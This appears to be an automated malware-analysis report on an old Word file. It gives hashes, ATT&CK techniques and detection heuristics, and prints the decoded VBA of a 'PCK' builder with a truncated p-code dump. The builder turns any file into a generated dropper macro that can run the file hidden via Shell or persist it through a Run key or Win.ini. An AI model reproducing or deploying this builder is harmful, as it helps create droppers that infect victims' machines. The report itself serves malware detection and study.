Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7d48b26f6be0245d…

MALICIOUS

Office (OLE)

377.0 KB Created: 1999-06-17 19:19:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 40badedf33e7735c0a6cf2a15d1f5738 SHA-1: a14146cb0603023bc3c41af12ecb8583eb9e62be SHA-256: 7d48b26f6be0245db05de8cbee341fd3fdf22c41d60c8f2a52d7cf3112fa0128
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1204.002 Malicious File

The sample is a Microsoft Word document containing VBA macros. The macros utilize the Shell() function and also attempt to write to the registry Run key to establish persistence. The script logic suggests it is designed to download and execute a second-stage payload, indicated by the 'PayloadString' variable and the file reading operations. Note that the extracted source itself contains no network call: the payload is read from a local path (FTC.Text) and emitted as a generated Sub Payload() that writes it to FTD.Text, so the code shown is a payload-to-macro builder and the download step, if any, is not visible in this listing.

Heuristics 3

  • ClamAV: Win.Tool.Macro-17 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Tool.Macro-17
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7848 bytes
SHA-256: ca6eced3b08ed754864d12376bc08b4a0af75dfba2e7e57335a6ff2ba68e8f74
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Document module entry point: its only action is to show the "PCK" form
' (the second module in this listing). The procedure is named Execute_PCK,
' not AutoOpen/Document_Open, so no auto-execution handler appears in the
' extracted source; whether anything triggers it automatically cannot be
' determined from this text.
Sub Execute_PCK()
PCK.Show
End Sub

Attribute VB_Name = "PCK"
Attribute VB_Base = "0{CD058D2D-46BE-11D3-8BBE-44455354616F}{CD058D20-46BE-11D3-8BBE-44455354616F}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' "PCK" form module: a builder that turns an arbitrary input file into a
' generated VBA Sub Payload() which re-creates that file on disk and then
' runs the execution/persistence line chosen on the form.
' The controls used below (FTC, FTD, SourceOut, OptionButton1-4) are form
' fields whose definitions are not part of the extracted text; their roles
' are inferred from how they are used here.
' There is no Option Explicit, so RunStr, X and Y are undeclared Variants.
' Raw contents of the input file named by FTC.Text.
Dim PayloadString As String
' ASCII code of the byte currently being encoded.
Dim TmpStr As Integer
' Generated "Chr(n) + Chr(n) + ..." expression that embeds the payload.
Dim OutStr As String
' Click handler of the form's "Create" button: picks the run/persistence
' line, reads the input file, encodes it, and writes the generated module.
Private Sub Create_Click()
' RunStr becomes the last statement of the generated Sub Payload().
' Each branch overwrites RunStr, so if more than one button were True the
' last one checked would win. FTD.Text is the path the generated code will
' write the payload to (see the Print #1 lines below).
'   Option 1: drop only, no execution and no autostart entry.
'   Option 2: Shell the dropped file with vbHide (hidden window) -- the
'             Shell() call behind the OLE_VBA_SHELL finding.
'   Option 3: HKLM\...\CurrentVersion\Run value named "PCK Public Beta"
'             pointing at the dropped file -- the Run-key write behind
'             T1547.001; the value name is a usable string indicator in
'             registry telemetry.
'   Option 4: legacy Win.ini [windows] run= entry, another autostart
'             location on old Windows versions.
If OptionButton1.Value = True Then RunStr = ""
If OptionButton2.Value = True Then RunStr = "Shell " & Chr(34) & FTD.Text & Chr(34) & ", vbHide"
If OptionButton3.Value = True Then RunStr = "System.PrivateProfileString(" & Chr(34) & Chr(34) & ", " & Chr(34) & "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" & Chr(34) & ", " & Chr(34) & "PCK Public Beta" & Chr(34) & ") = " & Chr(34) & FTD.Text & Chr(34)
If OptionButton4.Value = True Then RunStr = "System.PrivateProfileString(" & Chr(34) & "C:\Windows\Win.ini" & Chr(34) & ", " & Chr(34) & "windows" & Chr(34) & ", " & Chr(34) & "run" & Chr(34) & ") = " & Chr(34) & FTD.Text & Chr(34)
' Read the entire input file (path in FTC.Text) as one binary string.
' File handle #1 is reused for the output file further down.
Open FTC.Text For Binary As #1
PayloadString = Input(LOF(1), #1)
Close #1
' Encode every byte as "Chr(n)", joined with " + ". Y counts bytes on the
' current generated line and inserts a VBA line continuation ("_" CRLF)
' after every 10 bytes. This is plain embedding, not encryption, so the
' original bytes are fully recoverable from the generated source.
For X = 1 To Len(PayloadString)
Y = Y + 1
TmpStr = Asc(Mid(PayloadString, X, 1))
OutStr = OutStr & "Chr(" & TmpStr & ")"
If X < Len(PayloadString) Then OutStr = OutStr & " + "
If Y = 10 Then
If X < Len(PayloadString) Then OutStr = OutStr & "_" & Chr(13) & Chr(10)
Y = 0
End If
Next X
' Write the generated module to the path in SourceOut.Text. The emitted
' Sub Payload() opens FTD.Text For Output (text mode) and writes the
' decoded bytes with Print #, which appends a CR/LF after its data; the
' dropped file is therefore expected to be two bytes longer than the
' original, so its hash will not match the embedded payload's hash.
Open SourceOut.Text For Output As #1
Print #1, "Sub Payload()"
Print #1, "Open " & Chr(34) & FTD.Text & Chr(34) & " For Output As #1"
Print #1, "Print #1, " & OutStr
Print #1, "Close #1"
' The run/persistence line chosen above; an empty RunStr (option 1)
' yields a blank line in the generated module.
Print #1, RunStr
Print #1, "End Sub"
Close #1
End Sub
'PCK Public Beta is property
'of the public, hence the name.
'Feel free to modify PCK... Be
'sure to send me a copy of your
'changes. And by the way if you
'do change PCK, please acknowledge
'that I was The original creator.
'Thank you for your interest, Lys

' Processing file: /opt/analyzer/scan_staging/da3024b3c53f40c5922a44e17740d410.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 5250 bytes
' Line #0:
' 	FuncDefn (Sub Execute_PCK())
' Line #1:
' 	Ld PCK 
' 	ArgsMemCall Show 0x0000 
' Line #2:
' 	EndSub 
' Macros/VBA/PCK - 22802 bytes
' Line #0:
' 	Dim 
' 	VarDefn PayloadString (As String)
' Line #1:
' 	Dim 
' 	VarDefn TmpStr (As Integer)
' Line #2:
' 	Dim 
' 	VarDefn OutStr (As String)
' Line #3:
' 	FuncDefn (Private Sub Create_Click())
' Line #4:
' 	Ld OptionButton1 
' 	MemLd Value 
' 	LitVarSpecial (True)
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitStr 0x0000 ""
' 	St RunStr 
' 	EndIf 
' Line #5:
' 	Ld OptionButton2 
' 	MemLd Value 
' 	LitVarSpecial (True)
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitStr 0x0006 "Shell "
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	Ld FTD 
' 	MemLd Then 
' 	Concat 
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitStr 0x0008 ", vbHide"
' 	Concat 
' 	St RunStr 
' 	EndIf 
' Line #6:
' 	Ld OptionButton3 
' 	MemLd Value 
' 	LitVarSpecial (True)
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitStr 0x001C "System.PrivateProfileString("
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitStr 0x0002 ", "
' 	Concat 
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitStr 0x0040 "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run"
' 	Concat 
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitStr 0x0002 ", "
' 	Concat 
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitStr 0x000F "PCK Public Beta"
' 	Concat 
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitStr 0x0004 ") = "
' 	Concat 
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	Ld FTD 
' 	MemLd Then 
' 	Concat 
' 	LitDI2 0x0022 
' 	ArgsL
... (truncated)